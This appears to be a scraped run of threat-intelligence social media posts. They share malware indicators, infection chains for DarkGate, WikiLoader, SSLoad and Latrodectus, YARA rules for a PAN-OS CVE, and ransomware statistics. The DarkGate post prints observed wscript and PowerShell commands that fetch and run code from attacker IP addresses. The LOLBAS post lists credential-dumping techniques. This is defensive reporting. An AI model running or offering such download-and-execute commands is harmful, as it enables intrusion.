We decided to share our #YARA rules to scan for indicators of the exploitation of CVE-2024-3400 in #PaloAlto 's PAN-OS with the community and included some of the generic rules (detect similar attacks)

Three Steps

1. Generate a Tech Support file and extract it

Here are IOCs from a 'RAT Hat Trick' from today. It started with a url in an email and ended up launching #xworm , #venomrat and #asyncrat .

This was possibly the most convoluted malware campaign I've ever seen. 🙃

github.com/executemalware….

2024-04-18 (Thursday): #SSLoad infection leads to #CobaltStrike DLL. In this case we saw no follow-up Cobalt Strike C2 traffic. List of indicators available at bit.ly/3Q9SORR

#TimelyThreatIntel #Unit42ThreatIntel #Wireshark #InfectionAnalysis

Here are some #ssload #ta578 IOCs from today:
github.com/executemalware…

#WikiLoader - #TA544 - .pdf > url > .zip > .js > .js > .dll

wscript Invoice_818493.js

wscript out.js

C:\Users\Admin\AppData\Local\Temp\npp.8.6.4.portable.x64\notepad.exe (sideload)👇

\npp.8.6.3.portable.x64\plugins\mimeTools.dll

(1/3) 👇

IOC's
github.com/pr0xylife/Wiki…

2024-04-15 (Monday): #ContactForms campaign pushing #SSLoad malware as early as Thursday, 2024-04-11. List of indicators available at bit.ly/49Cz1kL

#Wirshark #Unit42ThreatIntel #TimelyThreatIntel #InfectionTraffic

Here are some IOCs from a sample that was analyzed on Friday. It seems to be #xloader #formbook but I could be mistaken.
github.com/executemalware…

Here are IOCs from a likely #kutaki #stealer sample from today.
github.com/executemalware…

#ISFB #LDR4 - url > .zip > .js > CobaltStrike

Interesting campaign this week purporting to be Hays Recruitment.

DocuSign lure that leads to a site that drops a zip file that contains a .js loader for #CobaltStrike

(1/3)👇IOC's continued

Here are some #darkgate IOCs from today:
#admin888 #edr3

github.com/executemalware…

Here are some #darkgate IOCs from today:
github.com/executemalware…

🌐 Following the dissolution of #BlackCat group and the surge in Lockbit's attack rate, other #ransomware groups have notably escalated their offensive 💨

➡️ On the last day Dragon Force, Black Basta, and Black Suit teams collectively accounted for approximately 28 new victims

#Darkgate - .xls > smb > .vbs > .exe

EXCEL statapril2024.xlsx

wscript \\45.89.53.]187\s\AZURE_DOCUMENT.vbs

powershell -Command Invoke-Expression Invoke-RestMethod -Uri 103.124.106.]237/wctaehcw

AutoHotkey C:/kady/script.ahk

attrib +h C:/kady/

IOC's
github.com/pr0xylife/Dark…

ThreatLabz has released an IDA plugin to deobfuscate the strings for previous versions of #Pikabot .

Read our blog here: zscaler.com/blogs/security…

The source code for the IDA plugin can be found here: github.com/threatlabz/pik…

#DarkGate New Infection #TTPs 🚨

#DFIR Exec Flow: VBS > PS > EXE (DLL SL)

[+] VBS T1059.005
[+] PS T1059.001
[+] DLL Side-Loading T1574.002

VBS exec fileless PS, the PS creates dir, downloads & exec next stage infection, uses DLL Side-Loading, and establishes a connection to C2

🌐 Live Last Week #Ransomware Statistics DARKFEED.IO/LastWeek/ 🎯

➡️ TOP TARGETED COUNTRIES:
🇺🇸 United States: 47
🇮🇱 Israel: 6
🇩🇪 Germany: 6
🇮🇹 Italy: 4
🇬🇧 United Kingdom: 3
🇮🇳 India: 3
🇨🇦 Canada: 3

➡️ TOP TARGETED SECTORS:
Business Services: 24
HealthCare: 7
Financial: 6

🏴‍☠️ Two powershell scripts used by possibly Turkish ransomware operators 🇹🇷 in January 2024, apparently were/are attacking MS-SQL servers to deploy #Mimic and probably also #Trigona .

▪ 'bytestream1.ps1': dc640a9e1594f9f4e18973b10944e1bf8188a8ad4457231d7fcd661d59e225bd (VT: 0/60)

Another #LOLBAS milestone: 200 entries 💯💯

Recent additions:
🔥wbadmin (NTDS.dit dumping)
🔥winproj/msaccess (INetCache downloaders)
🔥appcert (proxy execution)
🔥tar (to/from ADS)
🔥te (arbitrary DLL loading)

Thanks Avihay Eldad, irEasty, Nir Chako & others for contributing

🕷️ Obfuscated Javascript (raw.githubusercontent.com/CronUp/EnAnali…) leads to #Latrodectus via 'slack.msi' file at \\wireoneinternet.info@80\share\ (WebDAV)
+ bazaar.abuse.ch/sample/b9dbe96…

+ 18 JavaScript payloads at \\wireoneinternet.info@80\colt\ 🧐

C2 already reported:

Protect your Microsoft 365 tenant against (AITM) phishing attacks. Warn your users whenever they are targeted.

Installed in a few minutes 👇